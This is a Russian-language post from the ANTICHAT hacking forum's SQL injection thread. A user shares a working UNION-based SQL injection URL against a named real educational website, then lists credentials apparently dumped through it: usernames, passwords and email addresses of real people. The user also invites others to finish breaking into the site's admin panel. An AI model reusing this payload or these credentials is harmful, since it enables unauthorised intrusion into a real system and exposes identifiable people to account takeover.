HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 27.01.2008, 23:14
everm1nd
Новичок
Регистрация: 20.01.2007
Сообщений: 25
С нами: 10160498

Репутация: 8
По умолчанию
вот веселенький едушный сайт. до админки не догрыз, зато получил пасики от министерских мыльниц. если кто-нить финиширует, то дайте мне знать.
http://qt.exploratorium.edu/cils/resourcelist.php?categoryID=-1+union+select+concat_ws(char(58),username,passwor d)+from+account+limit%200,1
вот через эту штуку можно получить реквизиты. наковырял примерно это:
Код:
admin2:4dooney!2
richauslander:richauslander:dbeck@exploratorium.edu
erniekunze@earthlink.net:vivian  (Ernie Kunze)
thomasc@exploratorium.edu:11111
fperson@physics.ucsc.edu:11111
уязвимы все скрипты поголовно. даже регистрация. блин. гдеж там одминка-то))
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 21 (пользователей: 0 , гостей: 21)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.